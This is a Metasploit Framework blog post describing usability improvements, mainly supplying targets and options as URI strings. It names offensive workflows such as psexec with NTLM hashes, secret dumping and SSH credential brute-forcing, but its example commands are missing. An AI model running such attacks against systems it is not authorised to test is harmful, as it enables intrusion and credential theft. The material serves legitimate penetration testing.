Easier URI Targeting With Metasploit Framework

Last updated at Fri, 19 Jan 2024 15:44:57 GMT

Over the past year and a half, Metasploit Framework’s core engineering team in Belfast has made significant improvements to usability, discoverability, and the general quality of life for the global community of Framework users. A few of the enhancements we’ve worked on in MSF 6 include:

• A handy tip command in msfconsole that delivers tips n’ tricks to users
• Consolidated EternalBlue modules that removed the need for Python as a dependency, as well as automatic targeting support
• AutoCheck support, which runs the check functionality of a module before its exploit capabilities are executed to ensure the module will work beforehand, as well as providing a ForceExploit advanced option that allows a user-override this functionality
• A debug command in msfconsole that provides data to help users understand the root cause of issues
• Improved cross-platform support for msfdb, as well as supporting external databases — such as using a PostgreSQL Docker container
• User experience improvements, including word-wrapping tables, highlighting matched search terms in the search table, and introducing context-aware hints — such as letting users know that they can use the use command to easily select a searched module
• Reducing msfconsole’s boot time, as well as reducing the time required to search for modules, and list exploits/payloads in both the console and module.search RPC calls

Today's blog looks at another series of improvements that have overhauled Framework's option support to allow for streamlined workflows when specifying multiple module options for protocols like HTTP, MySQL, PostgreSQL, SMB, SSH, and more. This removes the need to individually call set for each module option value before running it — courtesy of pull request #15253.

Overview

Traditional usage of Metasploit involves loading a module and setting multiple options:

You could also specify multiple RHOSTS separated by spaces, or with a CIDR subnet mask:

URI support for RHOSTS

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit's console — it will also make it easier to share cheat sheets among pentesters.

SMB examples

There's a full page of documentation and examples in the Metasploit Wiki, but here are a few highlights that show the improvements.

Running psexec against a target host:

Running psexec with NTLM hashes:

Dumping secrets with NTLM hashes:

Downloading a file:

Uploading a file:

SSH examples

If you have valid SSH credentials, the ssh_login module will open a Metasploit session for you:

Brute-force host with known user and password list:

Brute-force credentials:

Brute-force credentials in a subnet:

It's also now possible to port forward through a Metasploit SSH session:

More examples

Full details and examples can be found within the Metasploit Wiki. At the time of release, the following protocols are now supported:

• cidr - Can be combined with other protocols to specify address subnet mask
• length
• file - Load a series of RHOST values separated by newlines from a file (this file can also include URI strings)
• http
• https
• mysql
• postgres
• smb
• ssh